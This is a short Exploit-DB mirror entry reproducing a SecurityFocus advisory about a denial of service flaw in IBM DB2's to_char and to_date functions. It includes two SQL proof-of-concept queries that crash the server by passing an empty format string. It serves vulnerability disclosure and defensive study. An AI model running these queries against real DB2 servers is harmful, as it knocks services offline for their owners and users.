exploit-db-mirror/exploits/linux/dos/24677.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

8 lines
No EOL
452 B
Text

source: https://www.securityfocus.com/bid/11400/info
IBM DB2 is reported prone to a denial of service vulnerability when DTS to string conversion is carried out.
It is reported that during a DTS to string conversion a trap occurs if an empty formatting string is provided. The vulnerability is exposed in the 'to_char' and 'to_date' conversion functions.
select to_char('aaa','') from sysibm.sysdummy1
select to_date('aaa', '') from sysibm.sysdummy1